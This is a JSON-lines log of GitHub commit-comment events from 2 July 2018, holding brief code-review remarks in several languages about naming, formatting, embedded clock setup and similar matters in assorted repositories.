{"id":"7904871269","type":"CommitCommentEvent","actor":{"login":"bchojnicki"},"repo":{"name":"MindboxGroup/openshift-ansible"},"payload":{"comment":{"id":29561914,"position":null,"line":null,"path":null,"commit_id":"3027030f718413e91b9748258f36f857748fed24","created_at":"2018-07-02T07:11:52Z","updated_at":"2018-07-02T07:11:52Z","author_association":"COLLABORATOR","body":"Fix symlink for docker registry configuration"}},"created_at":"2018-07-02T07:11:52Z"}
{"id":"7904872001","type":"CommitCommentEvent","actor":{"login":"grgrzybek"},"repo":{"name":"kiegroup/droolsjbpm-integration"},"payload":{"comment":{"id":29561915,"position":null,"line":null,"path":null,"commit_id":"0a0af3d2f8ff84c500da1238fb3de3fd3a68bd6a","created_at":"2018-07-02T07:12:04Z","updated_at":"2018-07-02T07:12:04Z","author_association":"CONTRIBUTOR","body":"@mariofusco @jiripetrlik, I think you have to remove this too: https://github.com/kiegroup/droolsjbpm-integration/blob/7.7.x/kie-osgi/kie-karaf-features/src/main/filtered-resources/repository/features-fuse.xml#L98-L100"}},"created_at":"2018-07-02T07:12:04Z"}
{"id":"7904872039","type":"CommitCommentEvent","actor":{"login":"santhoshisudini"},"repo":{"name":"santhoshisudini/SeleniumAutomationFramework-"},"payload":{"comment":{"id":29561916,"position":21,"line":21,"path":"SeleniumAutomationFramework/SeleniumOperations.cs","commit_id":"39c55f8c3ec731a2981374230d47d797da5f38f3","created_at":"2018-07-02T07:12:05Z","updated_at":"2018-07-02T07:12:05Z","author_association":"OWNER","body":"Why it is used"}},"created_at":"2018-07-02T07:12:05Z"}
{"id":"7904872435","type":"CommitCommentEvent","actor":{"login":"RajKamalDubey"},"repo":{"name":"RajKamalDubey/Python-Web-Development"},"payload":{"comment":{"id":29561918,"position":null,"line":null,"path":null,"commit_id":"d103cad4a95f5422017a3d03c155da6cab27be6c","created_at":"2018-07-02T07:12:11Z","updated_at":"2018-07-02T07:12:11Z","author_association":"OWNER","body":"Created Regarding CS50's Course web development with Python and Javascript."}},"created_at":"2018-07-02T07:12:11Z"}
{"id":"7904874540","type":"CommitCommentEvent","actor":{"login":"cmaumet"},"repo":{"name":"datalad/open-brain-consent"},"payload":{"comment":{"id":29561928,"position":null,"line":null,"path":null,"commit_id":"b11bead187726638c85b0e6347ad163f2a86f65e","created_at":"2018-07-02T07:12:43Z","updated_at":"2018-07-02T07:12:43Z","author_association":"MEMBER","body":"Thanks @yarikoptic "}},"created_at":"2018-07-02T07:12:43Z"}
{"id":"7904874892","type":"CommitCommentEvent","actor":{"login":"LeoNatan"},"repo":{"name":"wix/detox"},"payload":{"comment":{"id":29561932,"position":7,"line":13,"path":"docs/APIRef.MockingOpenFromURL.md","commit_id":"a2950e949c153525bf5f15b98c337f3c5e7a137f","created_at":"2018-07-02T07:12:48Z","updated_at":"2018-07-02T07:12:48Z","author_association":"MEMBER","body":"There is a slight difference. `relaunchApp` creates a new instance, while the `launchApp` doesn’t by default. "}},"created_at":"2018-07-02T07:12:48Z"}
{"id":"7904875606","type":"CommitCommentEvent","actor":{"login":"xwx535879"},"repo":{"name":"xwx535879/myjob"},"payload":{"comment":{"id":29561934,"position":2,"line":2,"path":"LICENSE.md/demo1","commit_id":"f639e1c90657d45368b81137e875aa0b77c094b3","created_at":"2018-07-02T07:13:00Z","updated_at":"2018-07-02T07:13:00Z","author_association":"OWNER","body":"#再做一次测试"}},"created_at":"2018-07-02T07:13:00Z"}
{"id":"7904883015","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29561957,"position":19,"line":21,"path":"vizsgagyak/TeljesVizsgaGyakRetake/Zoo/Zoo/Elephant.cs","commit_id":"6ed54d32ad5a0edcef1dc817972e2d44d6405892","created_at":"2018-07-02T07:14:58Z","updated_at":"2018-07-02T07:14:58Z","author_association":"NONE","body":"a `bool` method should never look like this. If you not sure what I mean find me for a 1on1 :)"}},"created_at":"2018-07-02T07:14:58Z"}
{"id":"7904883461","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29561961,"position":4,"line":14,"path":"vizsgagyak/TeljesVizsgaGyakRetake/Zoo/Zoo/Animal.cs","commit_id":"6ed54d32ad5a0edcef1dc817972e2d44d6405892","created_at":"2018-07-02T07:15:06Z","updated_at":"2018-07-02T07:15:06Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-02T07:15:06Z"}
{"id":"7904884899","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561968,"position":166,"line":127,"path":"src/System.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T07:15:28Z","updated_at":"2018-07-02T07:15:28Z","author_association":"OWNER","body":"Вопрос не глядя в документацию. Зачем включать тактирование порту, на котором есть пины с функцией подключения внешнего резонатора? У меня в 107 вроде не надо.\r\nИ сразу же ответ. В 107 для HSE пины не входят в состав ни одного порта и единственное предназначение этих пинов - только для подключения внешнего тактирования! Поэтому инициализировать порт в принципе не нужно. В принципе никакого конфликта и не возникает. Если условие не выполняется, то и инициализация не происходит. Нужно только правильно вызвать:  \r\n`void System::initHSE (const HardwareLayout::Port & _port, uint32_t /*pin*/)`   \r\nВ таком виде не получится. Перегрузку делаем или препроцессором?\r\n"}},"created_at":"2018-07-02T07:15:28Z"}
{"id":"7904886368","type":"CommitCommentEvent","actor":{"login":"Drutol"},"repo":{"name":"Drutol/MALClient"},"payload":{"comment":{"id":29561974,"position":null,"line":null,"path":null,"commit_id":"9f136cbf361f68b5ab187ab7ead2e9bd06e0df43","created_at":"2018-07-02T07:15:52Z","updated_at":"2018-07-02T07:15:52Z","author_association":"OWNER","body":"Emm, could you please make different branch if you are pushing WIP things?"}},"created_at":"2018-07-02T07:15:52Z"}
{"id":"7904886862","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29561975,"position":null,"line":null,"path":null,"commit_id":"6ed54d32ad5a0edcef1dc817972e2d44d6405892","created_at":"2018-07-02T07:16:00Z","updated_at":"2018-07-02T07:16:00Z","author_association":"NONE","body":"Please do not use Hungarian commit messages."}},"created_at":"2018-07-02T07:16:00Z"}
{"id":"7904887474","type":"CommitCommentEvent","actor":{"login":"bratkartoffel"},"repo":{"name":"instrumentisto/roundcube-docker-image"},"payload":{"comment":{"id":29561976,"position":7,"line":359,"path":"test/suite.bats","commit_id":"1dc07b84b41ae85f0eb1f5b8a95aeca03795b686","created_at":"2018-07-02T07:16:09Z","updated_at":"2018-07-02T07:16:09Z","author_association":"NONE","body":"Shouldn't it be \"which gpg\"?"}},"created_at":"2018-07-02T07:16:09Z"}
{"id":"7904889274","type":"CommitCommentEvent","actor":{"login":"Eiminyang"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29561978,"position":1,"line":1,"path":"images/0x4e27a56b7618024a487d628fcbbef9759ea2540d.Png","commit_id":"ee311d99c2d1312359c99f7746517ab3f0c281bf","created_at":"2018-07-02T07:16:35Z","updated_at":"2018-07-02T07:16:35Z","author_association":"NONE","body":"![0x4e27a56b7618024a487d628fcbbef9759ea2540d](https://user-images.githubusercontent.com/39787209/42149993-e327daa2-7e0a-11e8-8cad-dc788be99a99.png)\r\n"}},"created_at":"2018-07-02T07:16:35Z"}
{"id":"7904892789","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29561997,"position":8,"line":8,"path":"week-07/day-03/Counter/Counter/Models/Numbercs.cs","commit_id":"60e0d8925401a2389edd41ab5d2b076d65f89baf","created_at":"2018-07-02T07:17:30Z","updated_at":"2018-07-02T07:17:30Z","author_association":"NONE","body":"what does `Numbercs` mean is it a typo or it has some meaning? 🤔 "}},"created_at":"2018-07-02T07:17:30Z"}
{"id":"7904895651","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29562006,"position":8,"line":11,"path":"week-07/day-03/Counter/Counter/Services/ICounter.cs","commit_id":"60e0d8925401a2389edd41ab5d2b076d65f89baf","created_at":"2018-07-02T07:18:16Z","updated_at":"2018-07-02T07:18:16Z","author_association":"NONE","body":"here, no need for a new line"}},"created_at":"2018-07-02T07:18:16Z"}
{"id":"7904897093","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29562012,"position":6,"line":6,"path":"week-07/day-03/Counter/Counter/Services/Number.cs","commit_id":"60e0d8925401a2389edd41ab5d2b076d65f89baf","created_at":"2018-07-02T07:18:37Z","updated_at":"2018-07-02T07:18:37Z","author_association":"NONE","body":"finish every file with a new line at the end"}},"created_at":"2018-07-02T07:18:37Z"}
{"id":"7904898598","type":"CommitCommentEvent","actor":{"login":"Godson777"},"repo":{"name":"EzioisAwesome56/KekBot"},"payload":{"comment":{"id":29562018,"position":null,"line":null,"path":null,"commit_id":"9244103e1616575945ea30c899ca34a841539d79","created_at":"2018-07-02T07:19:02Z","updated_at":"2018-07-02T07:19:02Z","author_association":"NONE","body":"what"}},"created_at":"2018-07-02T07:19:02Z"}
{"id":"7904898919","type":"CommitCommentEvent","actor":{"login":"bobor23"},"repo":{"name":"PlexVPN/plex"},"payload":{"comment":{"id":29562022,"position":null,"line":null,"path":null,"commit_id":"5362c9aa15d4e0890c71b0c92d877981105c9626","created_at":"2018-07-02T07:19:08Z","updated_at":"2018-07-02T07:19:08Z","author_association":"NONE","body":"thank you "}},"created_at":"2018-07-02T07:19:08Z"}
{"id":"7904899133","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29562024,"position":2,"line":1,"path":"week-07/day-03/Counter/Counter/Views/Index.cshtml","commit_id":"60e0d8925401a2389edd41ab5d2b076d65f89baf","created_at":"2018-07-02T07:19:11Z","updated_at":"2018-07-02T07:19:11Z","author_association":"NONE","body":"what do you want to get from `@model Int32` ?"}},"created_at":"2018-07-02T07:19:11Z"}
{"id":"7904899788","type":"CommitCommentEvent","actor":{"login":"lkrocek"},"repo":{"name":"rolandoislas/BrightWebSocket"},"payload":{"comment":{"id":29562026,"position":50,"line":25,"path":"src/WebSocketClient.xml","commit_id":"1cb833dc89f42f60a658fe6680e6ebcf213a0c3e","created_at":"2018-07-02T07:19:21Z","updated_at":"2018-07-02T07:19:21Z","author_association":"NONE","body":"miss info in documentation"}},"created_at":"2018-07-02T07:19:21Z"}
{"id":"7904900353","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/DAISIE"},"payload":{"comment":{"id":29562028,"position":null,"line":null,"path":null,"commit_id":"9fe52966350ead8e6cfd4f0ba109af4002bc8d45","created_at":"2018-07-02T07:19:30Z","updated_at":"2018-07-02T07:19:30Z","author_association":"OWNER","body":"Note that I have not tested the function to the bone yet! Using different probabilities in weirder orders might break my function. If and only if you use it, @Neves-P, I assume you will add these ruthless tests?  "}},"created_at":"2018-07-02T07:19:30Z"}
{"id":"7904907351","type":"CommitCommentEvent","actor":{"login":"JTaky"},"repo":{"name":"ashangit/flink"},"payload":{"comment":{"id":29562038,"position":4,"line":205,"path":"flink-yarn/src/main/java/org/apache/flink/yarn/YarnApplicationMasterRunner.java","commit_id":"a1a4e252573953f96a6edaa64656b59ae1506a7d","created_at":"2018-07-02T07:21:10Z","updated_at":"2018-07-02T07:21:10Z","author_association":"NONE","body":"looks like we do not need it"}},"created_at":"2018-07-02T07:21:10Z"}
{"id":"7904908606","type":"CommitCommentEvent","actor":{"login":"barbudreadmon"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29562042,"position":null,"line":null,"path":null,"commit_id":"55b25a4208c453bb5b28cdce634d464c25fb646f","created_at":"2018-07-02T07:21:28Z","updated_at":"2018-07-02T07:21:28Z","author_association":"NONE","body":"@twinaphex i took a look at inputs this week-end, and also tried a few things in nullDC, seems to me like analog controls for naomi were never implemented in nullDC/reicast codebase. I'll see if i can figure something out, perhaps by looking at MAME's naomi driver."}},"created_at":"2018-07-02T07:21:28Z"}
{"id":"7904910372","type":"CommitCommentEvent","actor":{"login":"Randium"},"repo":{"name":"werewolves-devs/Werewolf_Bot"},"payload":{"comment":{"id":29562043,"position":null,"line":null,"path":null,"commit_id":"af42d16df68884d59a4f577832779ffe93ddcc19","created_at":"2018-07-02T07:21:56Z","updated_at":"2018-07-02T07:21:56Z","author_association":"COLLABORATOR","body":"Yes, that looks like a good one. It applies to every single scenario you coukd think of that could go wrong with that, and yet it is very specific and clear what is meant."}},"created_at":"2018-07-02T07:21:56Z"}
{"id":"7904910488","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29562044,"position":69,"line":78,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T07:21:58Z","updated_at":"2018-07-02T07:21:58Z","author_association":"OWNER","body":"Я предлагаю конфигурацию wait-state перенести в отдельный метод. По умолчанию, например в конструкторе System, ставить самой большой, чтобы не калечить микросхему. Это предложение для поддержания единообразия сигнатур в библиотеки."}},"created_at":"2018-07-02T07:21:58Z"}
{"id":"7904938026","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29562084,"position":16,"line":32,"path":"week-07/day-01/FirstWebApplication/FirstWebApplication/Startup.cs","commit_id":"ad5f0a10b4b6f4a3fde0c5b098002a1a1e9ad22b","created_at":"2018-07-02T07:28:31Z","updated_at":"2018-07-02T07:28:31Z","author_association":"NONE","body":"Also, do not write down what is does. Try to write down why it is working like this."}},"created_at":"2018-07-02T07:28:31Z"}
{"id":"7904941653","type":"CommitCommentEvent","actor":{"login":"miromini"},"repo":{"name":"miromini/web_homework"},"payload":{"comment":{"id":29562094,"position":3,"line":3,"path":"todos/src/actions/index.js","commit_id":"5e28f76c3a10c3c04bb39781434e4bd4e80b9458","created_at":"2018-07-02T07:29:22Z","updated_at":"2018-07-02T07:29:22Z","author_association":"OWNER","body":"This code does not need"}},"created_at":"2018-07-02T07:29:22Z"}
{"id":"7904942534","type":"CommitCommentEvent","actor":{"login":"zhouwenshuai1993"},"repo":{"name":"zhouwenshuai1993/PetA"},"payload":{"comment":{"id":29562096,"position":null,"line":null,"path":null,"commit_id":"853a0335932338e3cc50a86ea23bcf69bc6cc356","created_at":"2018-07-02T07:29:35Z","updated_at":"2018-07-02T07:29:35Z","author_association":"OWNER","body":"swift和OC混编"}},"created_at":"2018-07-02T07:29:35Z"}
{"id":"7904945482","type":"CommitCommentEvent","actor":{"login":"mivina"},"repo":{"name":"mivina/differentialEquation"},"payload":{"comment":{"id":29562101,"position":null,"line":null,"path":null,"commit_id":"8140cebca40beb56e8e7015d6576e2523c5422ac","created_at":"2018-07-02T07:30:16Z","updated_at":"2018-07-02T07:30:16Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-02T07:30:16Z"}
{"id":"7904949907","type":"CommitCommentEvent","actor":{"login":"seik"},"repo":{"name":"seik/kotlin-telegram-bot"},"payload":{"comment":{"id":29562111,"position":null,"line":null,"path":null,"commit_id":"159b274759cb9df4ba4d746c677d3a0a22827912","created_at":"2018-07-02T07:31:16Z","updated_at":"2018-07-02T07:31:16Z","author_association":"OWNER","body":"Ouch, I will fix it and launch a new version later today. Thanks for the catch."}},"created_at":"2018-07-02T07:31:16Z"}
{"id":"7904950553","type":"CommitCommentEvent","actor":{"login":"rerngvit"},"repo":{"name":"rerngvit/models"},"payload":{"comment":{"id":29562113,"position":null,"line":null,"path":null,"commit_id":"94be38c75f8946fabb35e2ac5c09050262d17aa9","created_at":"2018-07-02T07:31:25Z","updated_at":"2018-07-02T07:31:25Z","author_association":"OWNER","body":"@gydlcc I think so. You, however, need to change the dataset configuration. Have a look at the example in the following file. Look at particularly the \"image_shape\" attribute.  https://github.com/rerngvit/models/blob/master/research/attention_ocr/python/datasets/fsns.py"}},"created_at":"2018-07-02T07:31:25Z"}
{"id":"7904954422","type":"CommitCommentEvent","actor":{"login":"kento1109"},"repo":{"name":"kento1109/repo"},"payload":{"comment":{"id":29562120,"position":null,"line":null,"path":null,"commit_id":"724014b8625d80749fe1c0463af8600b2c8a7aab","created_at":"2018-07-02T07:32:20Z","updated_at":"2018-07-02T07:32:20Z","author_association":"OWNER","body":"for imbalanced data"}},"created_at":"2018-07-02T07:32:20Z"}
{"id":"7904956826","type":"CommitCommentEvent","actor":{"login":"robbyoung"},"repo":{"name":"robbyoung/HabbajetAngular"},"payload":{"comment":{"id":29562128,"position":null,"line":null,"path":null,"commit_id":"fb046364949480ce2ad7dcfa6fac50540f086f28","created_at":"2018-07-02T07:32:55Z","updated_at":"2018-07-02T07:32:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Purchase List Scroll](https://trello.com/c/rwaz84oe/43-purchase-list-scroll)"}},"created_at":"2018-07-02T07:32:55Z"}
{"id":"7904957149","type":"CommitCommentEvent","actor":{"login":"smirik"},"repo":{"name":"4xxi/guidelines"},"payload":{"comment":{"id":29562130,"position":17,"line":13,"path":"create-task-rules.md","commit_id":"2e5e33dc1b815a17c2bdf552ef3eb5bfe0e03265","created_at":"2018-07-02T07:33:01Z","updated_at":"2018-07-02T07:33:01Z","author_association":"CONTRIBUTOR","body":"И как это добавляет ценность продукту? Это, в целом, если и добавляет, то мизерно с учётом того, сколько людей этой формой пользуются."}},"created_at":"2018-07-02T07:33:01Z"}
{"id":"7904958962","type":"CommitCommentEvent","actor":{"login":"ywen8"},"repo":{"name":"ywen8/Monocular_DoorControl"},"payload":{"comment":{"id":29562135,"position":null,"line":null,"path":null,"commit_id":"13055ca1a54570d467d8962ca2798cbe07b8b211","created_at":"2018-07-02T07:33:28Z","updated_at":"2018-07-02T07:33:28Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-02T07:33:28Z"}
{"id":"7904961515","type":"CommitCommentEvent","actor":{"login":"skmoin007"},"repo":{"name":"skmoin007/nscan"},"payload":{"comment":{"id":29562137,"position":null,"line":null,"path":null,"commit_id":"4bce3d28b4b33707eecb3d82c728d9db15b3ee82","created_at":"2018-07-02T07:34:05Z","updated_at":"2018-07-02T07:34:05Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-02T07:34:05Z"}
{"id":"7904966166","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29562153,"position":33,"line":85,"path":"actionlibrary/src/test/java/com/axway/ats/action/filesystem/Test_FileSystemOperations.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T07:35:09Z","updated_at":"2018-07-02T07:35:09Z","author_association":"OWNER","body":"Check this row more"}},"created_at":"2018-07-02T07:35:09Z"}
{"id":"7904968895","type":"CommitCommentEvent","actor":{"login":"sergejx"},"repo":{"name":"mfecenko/yajco-examples"},"payload":{"comment":{"id":29562162,"position":null,"line":null,"path":null,"commit_id":"237e457fdd11ceec0896aa4823c164f524374a2b","created_at":"2018-07-02T07:35:47Z","updated_at":"2018-07-02T07:35:47Z","author_association":"NONE","body":"Nedávajte do commitu generované súbory (adresár target), logy a podobné veci. Takisto zmeny v adresári `.idea` tam radšej zatiaľ nedávajte, lebo to zneprehľadnňue commit. Do budúcna asi odstránime z repozitára všetky súbory špecifické pre konkrétne IDE."}},"created_at":"2018-07-02T07:35:47Z"}
{"id":"7904976238","type":"CommitCommentEvent","actor":{"login":"jjoe0303"},"repo":{"name":"YI-LING-BA-JI-JHUAN-TI-SHENG/project"},"payload":{"comment":{"id":29562176,"position":null,"line":null,"path":null,"commit_id":"825626bfdb76e1da9f58d9b87794a3983c109b23","created_at":"2018-07-02T07:37:32Z","updated_at":"2018-07-02T07:37:32Z","author_association":"CONTRIBUTOR","body":"https://www.cnblogs.com/yebo92/p/7443847.html"}},"created_at":"2018-07-02T07:37:32Z"}
{"id":"7904976582","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29562177,"position":null,"line":null,"path":null,"commit_id":"84b6c01d7addc82d33776ac8d5db79dc3a6d3b68","created_at":"2018-07-02T07:37:37Z","updated_at":"2018-07-02T07:37:37Z","author_association":"NONE","body":"Please try to start work with ASP.NET and catch up with the others. First it will be hard, but it is a great framework."}},"created_at":"2018-07-02T07:37:37Z"}
{"id":"7904978408","type":"CommitCommentEvent","actor":{"login":"argus777"},"repo":{"name":"argus777/websiteAgnostycA"},"payload":{"comment":{"id":29562182,"position":2,"line":2,"path":"README.md","commit_id":"f85791faf4fe4060a30e1882a4d4f5f0a5263285","created_at":"2018-07-02T07:38:04Z","updated_at":"2018-07-02T07:38:04Z","author_association":"OWNER","body":"\r\n<html>\r\n<title>AgnostycA</title>\r\n<head></head>\r\n<body><h1>Website AgnostycA -- Work in progress!</h1>\r\n![agno](https://user-images.githubusercontent.com/40549903/42150571-d05d6c98-7dc9-11e8-9e25-3b4a6b5073db.gif)\r\n\r\n</body>\r\n</html>"}},"created_at":"2018-07-02T07:38:04Z"}
{"id":"7904979084","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562185,"position":27,"line":27,"path":"RestaurantWCF/IDishService.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:38:14Z","updated_at":"2018-07-02T07:38:14Z","author_association":"COLLABORATOR","body":"Nie zostawiaj tego"}},"created_at":"2018-07-02T07:38:14Z"}
{"id":"7904986719","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562201,"position":11,"line":11,"path":"RestaurantWCF/IDishService.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:40:05Z","updated_at":"2018-07-02T07:40:05Z","author_association":"COLLABORATOR","body":"Dla kogo to jest?"}},"created_at":"2018-07-02T07:40:05Z"}
{"id":"7904988120","type":"CommitCommentEvent","actor":{"login":"back-assist"},"repo":{"name":"back-assist/introgit"},"payload":{"comment":{"id":29562209,"position":1,"line":1,"path":"index.html","commit_id":"c32f95f9c2d9802b84a3bc1836ea23d897cd2491","created_at":"2018-07-02T07:40:25Z","updated_at":"2018-07-02T07:40:25Z","author_association":"OWNER","body":"HTML５　宣言文"}},"created_at":"2018-07-02T07:40:25Z"}
{"id":"7904989269","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Plonee"},"payload":{"comment":{"id":29562211,"position":3,"line":2,"path":"week-07/day-04/repos/OrcClub/OrcClub/Views/Home/Info.cshtml","commit_id":"bce83d92b8e640a97c2632d1dda5109cb6cbf2fb","created_at":"2018-07-02T07:40:42Z","updated_at":"2018-07-02T07:40:42Z","author_association":"NONE","body":"what does this `ViewData` do?"}},"created_at":"2018-07-02T07:40:42Z"}
{"id":"7904989546","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562212,"position":26,"line":26,"path":"OrderApp/AddForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:40:46Z","updated_at":"2018-07-02T07:40:46Z","author_association":"COLLABORATOR","body":"OrderForm sender, nazwa kompletnie nie pasuje"}},"created_at":"2018-07-02T07:40:46Z"}
{"id":"7904993502","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562218,"position":20,"line":20,"path":"OrderApp/AddForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:41:40Z","updated_at":"2018-07-02T07:41:40Z","author_association":"COLLABORATOR","body":"Przyjeło się kilka nomenklatur, ta najczęsciej spotykana mówi ze nazwy zmiennych prywatnych tworzymy z wykorzystaniem camelCase. R# potrafi to ogarniać z automatu"}},"created_at":"2018-07-02T07:41:40Z"}
{"id":"7904996967","type":"CommitCommentEvent","actor":{"login":"platinumthinker"},"repo":{"name":"travelping/capwap"},"payload":{"comment":{"id":29562224,"position":29,"line":29,"path":"docs/dhcp_relay.md","commit_id":"2cfa58fbbf39193baa107f19f4ed8bb5646ec9c7","created_at":"2018-07-02T07:42:30Z","updated_at":"2018-07-02T07:42:30Z","author_association":"MEMBER","body":"capwap-ac own external_ip for receive DHCP packets from DHCP server, and serviers it's list IP's DHCP servers"}},"created_at":"2018-07-02T07:42:30Z"}
{"id":"7904998723","type":"CommitCommentEvent","actor":{"login":"RealHospital"},"repo":{"name":"HoDaDak/the-great-wizard-and-his-men"},"payload":{"comment":{"id":29562230,"position":null,"line":null,"path":null,"commit_id":"3827000d3ad0146c082515e3c3dbc8e1d632c01e","created_at":"2018-07-02T07:42:54Z","updated_at":"2018-07-02T07:42:54Z","author_association":"CONTRIBUTOR","body":"+ bug fix (text, cooldown, etc...)"}},"created_at":"2018-07-02T07:42:54Z"}
{"id":"7905003569","type":"CommitCommentEvent","actor":{"login":"TiibCD"},"repo":{"name":"wekan/wekan"},"payload":{"comment":{"id":29562242,"position":null,"line":null,"path":null,"commit_id":"6a587299b80a49fce0789628ff65885b5ed2c837","created_at":"2018-07-02T07:44:01Z","updated_at":"2018-07-02T07:44:01Z","author_association":"NONE","body":"Thank you for listenning"}},"created_at":"2018-07-02T07:44:01Z"}
{"id":"7905003588","type":"CommitCommentEvent","actor":{"login":"pietersweter"},"repo":{"name":"rrudol/rest-api"},"payload":{"comment":{"id":29562243,"position":null,"line":null,"path":null,"commit_id":"4ce19291b51106dce303cd901fe858d821226113","created_at":"2018-07-02T07:44:01Z","updated_at":"2018-07-02T07:44:01Z","author_association":"NONE","body":"+1"}},"created_at":"2018-07-02T07:44:01Z"}
{"id":"7905005771","type":"CommitCommentEvent","actor":{"login":"justfubo"},"repo":{"name":"justfubo/test"},"payload":{"comment":{"id":29562248,"position":null,"line":null,"path":null,"commit_id":"2ced8701973ec9865f632e6e3cec6d3310383d2a","created_at":"2018-07-02T07:44:31Z","updated_at":"2018-07-02T07:44:31Z","author_association":"OWNER","body":"122"}},"created_at":"2018-07-02T07:44:31Z"}
{"id":"7905006360","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29562251,"position":71,"line":95,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T07:44:39Z","updated_at":"2018-07-02T07:44:39Z","author_association":"COLLABORATOR","body":"これ、 `\"#{}\"` で囲っているのはどうしてですかね？"}},"created_at":"2018-07-02T07:44:39Z"}
{"id":"7905007475","type":"CommitCommentEvent","actor":{"login":"alexandrestein"},"repo":{"name":"labstack/echo"},"payload":{"comment":{"id":29562253,"position":null,"line":null,"path":null,"commit_id":"b64e4d12c7319f830509003dcbcf6b719b5b00df","created_at":"2018-07-02T07:44:55Z","updated_at":"2018-07-02T07:44:55Z","author_association":"NONE","body":"Sorry for the delay.\r\n\r\nIf I remembre correctly (which is absolutely not sure) this line was displaying error twice.\r\nBut with no much conviction.\r\n\r\nBut apparently we faced the same error pretty much in the same time and at this point is was apparently clear that this line needs to be removed.\r\n\r\nBut sorry, I can't point precisely what was the issue."}},"created_at":"2018-07-02T07:44:55Z"}
{"id":"7905007647","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29562254,"position":72,"line":96,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T07:44:57Z","updated_at":"2018-07-02T07:44:57Z","author_association":"COLLABORATOR","body":"`elsif`  をつkっているのはどうしてですか？"}},"created_at":"2018-07-02T07:44:57Z"}
{"id":"7905009067","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562259,"position":74,"line":74,"path":"OrderApp/AddForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:45:18Z","updated_at":"2018-07-02T07:45:18Z","author_association":"COLLABORATOR","body":"Aplikacja w en będzie moim zdaniem atutem"}},"created_at":"2018-07-02T07:45:18Z"}
{"id":"7905009652","type":"CommitCommentEvent","actor":{"login":"justfubo"},"repo":{"name":"justfubo/test"},"payload":{"comment":{"id":29562261,"position":2,"line":2,"path":"test1.java","commit_id":"2ced8701973ec9865f632e6e3cec6d3310383d2a","created_at":"2018-07-02T07:45:26Z","updated_at":"2018-07-02T07:45:26Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-02T07:45:26Z"}
{"id":"7905010330","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562262,"position":62,"line":62,"path":"OrderApp/AddForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:45:35Z","updated_at":"2018-07-02T07:45:35Z","author_association":"COLLABORATOR","body":"Słaba nazwa zmiennej"}},"created_at":"2018-07-02T07:45:35Z"}
